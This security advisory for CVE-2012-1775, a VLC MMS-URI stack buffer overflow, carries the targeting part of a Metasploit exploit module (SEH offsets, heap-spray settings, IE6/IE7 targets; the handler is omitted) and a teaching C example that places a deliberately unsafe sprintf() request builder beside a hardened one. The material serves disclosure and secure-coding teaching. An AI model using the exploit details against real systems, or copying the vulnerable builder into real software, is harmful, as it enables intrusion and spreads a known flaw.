Published: 2012-05-03
Updated: 2012-05-07
Affected systems:
VideoLAN VLC Media Player 2.x
Unaffected systems:
VideoLAN VLC Media Player 2.0.1
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53391
CVE ID: CVE-2012-1775
VLC Media Player (originally named VideoLAN Client) is the media player of the VideoLAN project.
VLC Media Player versions prior to 2.0.1 contain a stack-based buffer overflow: the MMS stream handling code uses sprintf() to format an attacker-controlled mms:// URI into a fixed-size stack buffer, so a specially crafted MMS stream lets a remote attacker who gets a victim to open it execute arbitrary code in the context of the player.
<*Source: Florent Hochwelker
Link:
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk!
Florent Hochwelker () provided the following test method:
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "VLC MMS Stream Handling Buffer Overflow",
      'Description'    => %q{
          This module exploits a buffer overflow in VLC media player prior to
        2.0.1. The vulnerability is due to a dangerous use of sprintf which can result
        in a stack buffer overflow when handling a malicious MMS URI.

          This module uses the browser as attack vector. A specially crafted MMS URI is
        used to trigger the overflow and get flow control through SEH overwrite. Control
        is transferred to code located in the heap through a standard heap spray.

          The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Florent Hochwelker', # aka TaPiOn, Vulnerability discovery
          'sinn3r',             # Metasploit module
          'juan vazquez'        # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2012-1775'],
          ['OSVDB', '80188'],
          ['URL', 'http://www.videolan.org/security/sa1201.html'],
          # Fix commit diff
          ['URL', 'http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
          'Space'    => 1000
        },
      'DefaultOptions' =>
        {
          'ExitFunction'         => "process",
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested with VLC 2.0.0
          [ 'Automatic', {} ],
          [
            'Internet Explorer 6 on XP SP3',
            {
              'Rop'         => false,
              # Space needed to overflow and generate an exception
              # which allows to get control through SEH overwrite
              'Offset'      => 5488,
              'OffsetShell' => '0x800 - code.length',
              'Blocks'      => '1550',
              'Padding'     => '0'
            }
          ],
          [
            'Internet Explorer 7 on XP SP3',
            {
              'Rop'         => false,
              # Space needed to overflow and generate an exception
              # which allows to get control through SEH overwrite
              'Offset'      => 5488,
              'OffsetShell' => '0x800 - code.length',
              'Blocks'      => '1600',
              'Padding'     => '1'
            }
          ]
        ],
      'DisclosureDate' => "Mar 15 2012",
      'DefaultTarget'  => 0))
  end

  # The rest of the module (the request handler that serves the page carrying
  # the heap spray and the crafted MMS URI) is not reproduced on this page.
end
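The bug class described in the advisory text and in the module description above (an attacker-controlled part of an mms:// URI formatted with sprintf() into a fixed-size stack buffer), shown as an added illustrative example. This is not VLC's code, not the Metasploit module, and not from the page's author: the 64-byte buffer, the request format string, the 256-byte host limit and the mms:// parsing are assumptions chosen to keep the demonstration small; the real overflow site and sizes are in the VLC fix commit referenced in the module. The vulnerable shape and the hardened form sit side by side so the missing check is visible.

```c
/*
 * Illustrative example of the bug class behind CVE-2012-1775 (not VLC's code):
 * a component of an mms:// URI is formatted with sprintf() into a fixed-size
 * stack buffer, so a URI longer than the buffer smashes the stack. The hardened
 * form bounds the write and rejects the URI instead of truncating silently.
 * REQ_BUF_SIZE, REQ_FMT and the host limit are assumptions for this demo.
 */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define REQ_BUF_SIZE 64                  /* assumed fixed stack buffer size */
#define REQ_FMT      "NSPlayer; Host: %s" /* assumed request line format */

/* Copy the host part of "mms://host[:port][/path]" into dst (dst_size bytes).
 * Returns 0 on success, -1 if the scheme is wrong or the host does not fit. */
int mms_parse_host(const char *uri, char *dst, size_t dst_size)
{
    const char *scheme = "mms://";
    size_t slen = strlen(scheme);
    if (strncmp(uri, scheme, slen) != 0)
        return -1;
    const char *host = uri + slen;
    size_t hlen = strcspn(host, ":/");     /* host ends at port or path */
    if (hlen == 0 || hlen + 1 > dst_size)
        return -1;
    memcpy(dst, host, hlen);
    dst[hlen] = '\0';
    return 0;
}

/* Vulnerable shape: no bound on the write. A host longer than
 * REQ_BUF_SIZE - strlen("NSPlayer; Host: ") - 1 bytes writes past the end of
 * req[], which is what a crafted mms:// URI exploits (the overwritten SEH
 * record in the module above lives beyond that end). Only call this with
 * input you already know fits. */
void build_mms_request_unsafe(char req[REQ_BUF_SIZE], const char *host)
{
    sprintf(req, REQ_FMT, host);
}

/* Hardened form: snprintf() plus an explicit truncation check. Returns 0 on
 * success and -1 when the request would not fit; the caller must then reject
 * the URI rather than continue with a truncated request. */
int build_mms_request_safe(char *req, size_t req_size, const char *host)
{
    int n = snprintf(req, req_size, REQ_FMT, host);
    if (n < 0 || (size_t)n >= req_size) {
        req[0] = '\0';
        return -1;
    }
    return 0;
}

/* Would the unchecked sprintf() version overflow for this host? This is the
 * length check the vulnerable code lacked; snprintf(NULL, 0, ...) measures
 * the formatted length without writing anything. */
bool unsafe_request_would_overflow(const char *host)
{
    int n = snprintf(NULL, 0, REQ_FMT, host);
    return n < 0 || (size_t)n + 1 > REQ_BUF_SIZE;
}

/* End to end on the hardened path: parse a URI and build the request.
 * Returns 0 if the URI is acceptable, -1 if it must be rejected. */
int handle_mms_uri(const char *uri, char *req, size_t req_size)
{
    char host[256];   /* assumed host length limit */
    if (mms_parse_host(uri, host, sizeof host) != 0)
        return -1;
    return build_mms_request_safe(req, req_size, host);
}
```

The two bounds (on the parsed host and on the formatted request) are independent: a host that passes the first can still fail the second once the format prefix is added, which is why the hardened builder checks snprintf()'s return value rather than trusting an upstream limit.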